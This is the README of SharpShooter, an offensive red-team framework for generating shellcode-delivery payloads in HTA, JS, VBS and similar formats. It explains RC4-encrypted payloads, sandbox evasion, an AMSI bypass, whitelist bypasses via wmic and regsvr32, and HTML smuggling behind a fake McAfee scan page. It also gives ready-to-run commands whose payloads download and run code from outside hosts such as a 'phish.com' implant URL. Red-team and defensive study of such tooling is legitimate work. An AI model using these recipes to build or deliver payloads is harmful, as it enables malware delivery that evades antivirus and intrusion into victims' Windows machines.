SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.
SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.
Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.
SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.
Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; --com, --awl and --awlurl.
Further information can be found on the MDSec blog post.
Usage - Command Line Mode:
SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.
Running SharpShooter with the --help argument will produce the following output:
Examples of some use cases are provided below:
usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
[--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
[--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
[--rawscfile <path>] [--shellcode] [--scfile <path>]
[--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
[--web <web>] [--dns <dns>] [--output <output>]
[--smuggle] [--template <tpl>]
-h, --help show this help message and exit
--stageless Create a stageless payload
--dotnetver <ver> Target .NET Version: 2 or 4
--com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
--awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32
--awlurl <awlurl> URL to retrieve XSL/SCT payload
--payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf
--sandbox <types> Anti-sandbox techniques:
 Key to Domain (e.g. 1=CONTOSO)
 Ensure Domain Joined
 Check for Sandbox Artifacts
 Check for Bad MACs
 Check for Debugging
--amsi <amsi> Use amsi bypass technique: amsienable
--delivery <type> Delivery method: web, dns, both
--rawscfile <path> Path to raw shellcode file for stageless payloads
--shellcode Use built in shellcode execution
--scfile <path> Path to shellcode file as CSharp byte array
--refs <refs> References required to compile custom CSharp,
--namespace <ns> Namespace for custom CSharp,
--entrypoint <ep> Method to execute,
--web <web> URI for web delivery
--dns <dns> Domain for DNS delivery
--output <output> Name of output file (e.g. maldoc)
--smuggle Smuggle file inside HTML
--template <tpl> Name of template file (e.g. mcafee)
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
Create a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
Custom CSharp inside VBS
This example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.
SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee
Creation of a Squiblytwo VBS
This example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The --awl parameter is not used by defaults to wmic.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
Creation of a XSL HTA
This example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
Author and Credits
Author: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabs
- @tiraniddo: James Forshaw for DotNetToJScript
- @Arno0x0x: for EmbedInHTML
- @buffaloverflow: Rich Warren for Demiguise
- @arvanaghi and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for CheckPlease
- @subTee: Documentation for Squiblydoo and Squiblytwo techniques